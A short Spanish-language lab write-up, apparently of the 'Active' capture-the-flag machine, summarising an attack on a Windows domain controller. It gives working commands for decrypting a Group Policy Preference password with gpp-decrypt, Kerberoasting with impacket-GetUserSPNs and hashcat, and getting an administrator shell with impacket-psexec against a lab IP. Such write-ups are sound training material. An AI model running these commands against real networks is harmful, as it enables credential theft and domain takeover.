Active

Resumen de la resolución

  • Máquina Windows DC con servicio SMB expuesto

  • Explotación SMB con pivoting de usuarios

  • Abuso de GPP (Group Policy Preference) para conseguir credenciales encriptadas con Microsoft AES

  • Ataque Kerberoasting

Habilidades adquiridas

  • Explotación de GPP, característica que se puede encontrar en sistemas Windows Server 2008 y previos, para conseguir credenciales encriptadas almacenadas en el archivo Groups.xml y desencriptarlas posteriormente con gpp-decrypt.

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Comandos y herramientas destacables

  • Kerberoasting

impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.129.228.53 -request -o krb5tgs.txt
hashcat -m 13100 krb5tgs_hashes /usr/share/wordlists/rockyou.txt
  • Obtención de shell abusando de permisos de escritura en recursos compartidos por SMB

impacket-psexec active.htb/[email protected]

impacket-psexec carga un ejecutable con un nombre aleatorio en uno de los recursos compartidos de Windows y registra un servicio a través de RPC que nos otorga una shell interactiva

Walkthrough en YouTube:

Última actualización